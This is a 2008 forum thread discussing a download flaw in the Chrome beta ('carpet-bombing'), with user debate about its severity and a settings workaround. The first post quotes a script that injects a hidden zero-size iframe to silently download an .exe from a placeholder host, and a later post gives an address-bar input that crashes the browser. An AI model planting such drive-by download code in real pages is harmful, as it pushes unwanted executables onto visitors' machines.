Ok, what im about to tell you and show you. wasen't generated or whatever by me, i just stumbled upon it so no pointing fingers
Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.
Example:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough.

Careful guys

Bugs like that are definitely expected as it is beta, although that is a very bad one. What made me get rid of it was the sentence in the ToS saying they could publish and reproduce anything you post to the internet when using Chrome.

Omg that's evry insecure ,anyway it's useless for Google to enter the browser Market.

im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Uh-huh...

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

ehm... no.
but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol

Its using the old version of webkit... there is a newer version that this bug is fixed on.

Its the carpet bomb bug people were going crazy about before.

I was wondering when something like this was going to appear.

it is an interesting security hole. spyware, trojans, keyloggers and zombie bots will love that bypass.

yeah, if a guy posts about google chrome a day before
20% of his reader get it. then do the vuln on his site, if its famous blog he cant harvest thousands.

September 2nd, 2008
Google Chrome vulnerable to carpet-bombing flaw

Posted by Ryan Naraine @ 3:05 pm

http://blogs.zdnet.com/security/?p=1843
http://blogs.zdnet.com/security/?p=1843&tag=nl.e539

Oh dear. Thanks for the heads up. Im usually very careful anyway but I shall double my efforts. Its annoying because I really love Chrome.

Why, design looks like lego xD

damn, I was about to test incognito on porn sites
I'll hold off for a while, until they fix it.

lego, pokemon ball, window media player logo...the list goes on.

By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php

Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox?




Um...did you just create that forum?

Only if you are on XP. The interface on vista is sex.

like streamed sex? neat

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is.

Uh-oh.

its BETA for a reason... you find bugs, google puts in a fix....

Does Chrome auto-update?

Says it does.

http://www.neowin.net/news/main/08/09/03/g...easons-to-avoid

Did we already not know this? I mean it's beta, it's going to have gaping flaws everywhere. It's still a little stupid to release something with such a huge hole though. More like irresponsible considering this is Google, right? Because when they mess up, it's cool. When others mess up it's a media frenzy.

I don't think this is going to be easy for Google by any means. Other browsers are better Maxthon, IE, Firefox, Opera..why the huge fuss over this? Those browsers do everything and more so why would I take a step back? My two cents. It will probably take years before it makes it out of Beta.

i dont recall any of the browser having such bugs that it seems like they were done in purpose, cmon now, how dumb do you have to be to make the things that it does happen. my guess is dumb as google (which is pretty high up the scale.)

This isn't exactly a huge problem, and in fact I'd prefer if google DIDN'T fix it.

The "problem" is that google auto-downloads any file type, rather than popping up copious security warnings like IE does. It's not a serious security problem because it still requires one mouse click to actually run that exe file.

Remember that a malicious file on your PC does no harm as long as it isn't executed, and in this case it requires an explicit mouse click on the chrome gui to make it run, which is just the way it should be.

And it still can't install anything or do much harm behind Vista's UAC.

doesnt matter if its beta or not, especialy since just about everything google does/has is still beta ( permanent beta )

i like chrome personally,.. but just type :% in the address bar and your entire browser will crash

but i still like chrome

Confirmed on that, wonder what about that makes it crash.

I'm also going into withdrawal anytime I use Chrome for some mouse gestures. I think browsers should have those built in now because they're so handy.

Explains why my firewall told me not to allow it.

type :% in address bar and watch it crash

its funny how people react to some lame sentence in terms of service.

So let me get this right. Everyone is going crazy because the browser expects people to have common sense and click for themselves if they want to execute an exe or not? omg please someone call the webpolice.

And the thing that they are allowed to post anything you surf to on the internet is probably so they are able to debug things if they happen. Not to mention google likes playing with ads so could be related to that. I doubt they are going to post your 50 porn sites you surf to a day on the front page of google.

You're missing the point entirely. Browsers should run in a sandboxed environment owing to the nature of the web; allowing files of any kind to be saved to the user's machine without their consent (outside of the designated areas for cookies etc.) is a security flaw and I fail to see how you can think otherwise.

That is not good at all. Google should of went through this a little closer, before releasing it as a public beta.

oh noes, watch out!

<posted from Chrome>

Hmm I was replying to the fact Chrome does not refuse exe files but opens a dialog box to check if you want to execute it. To me there is nothing wrong with that.

Which of all these is it? Because I like info on the internet... everyone goes crazy and starts throwing stuff everywhere. Someone in this topic says they execute it without warning, another says they open a dialog box another says they download it without warning without executing it...

Also it's a beta, there have been much bigger flaws in live versions from for example IE.

Ah, we're talking about different things:

The issue is that with iframes the file can be downloaded onto the desktop of the user. Without any prompts whatsoever. Yes, it won't be opened, but the mere fact that anything is automatically downloaded, particularly an executable file, is a security risk. It's not that I, or the original poster, is suggesting EXE files should be blocked: it's that without any user interaction whatsoever I could construct a page that downloaded twenty EXE files onto the user's desktop, just by visiting. That's poor.

You'd think Google would've fixed the EXE flaw before releasing this, it's a damn big security hole.

I'll say... it's as if all these people think they're going to publish some world-changing thesis paper and Google's going to steal it cause they used Chrome.

I think it's funny how paranoid and ignorant everyone is.

IMO it's more than that. If they can apparently have control of what you post when using Chrome...how can they tell that you're using Chrome? Do the log keystrokes or something?

its not a security hole, because for a hole you need land arround it, its just chaos.

erm yeah.

[Thread Moved to Webkit Browser]

didnt know this place existed

first this has nothing to do with WebKit the rendering engine. WebKit does not handle file downloads. It's the UI shell that decides what to do with a file that the rendering engine don't understand (ie. not web pages).

Second, back when Safari the browser had the carpet bombing exploit, there was no option to stop that. All downloads are automatically with no option to change that. For Chrome just go to Options -> Minor Tweaks -> check "Ask where to save each file before downloading", and you'll be prompted every time a download start.


well, you can "fix" it yourself, by enabled an option in the Options menu.


well combined with an exploit in Windows (which I'm not sure if it's still there) or Java, the downloaded file can be automatically executed.


well, I guess Google expected that anyone who wanted to fix it can fix it themselves, by ticking a checkbox in the Options menu.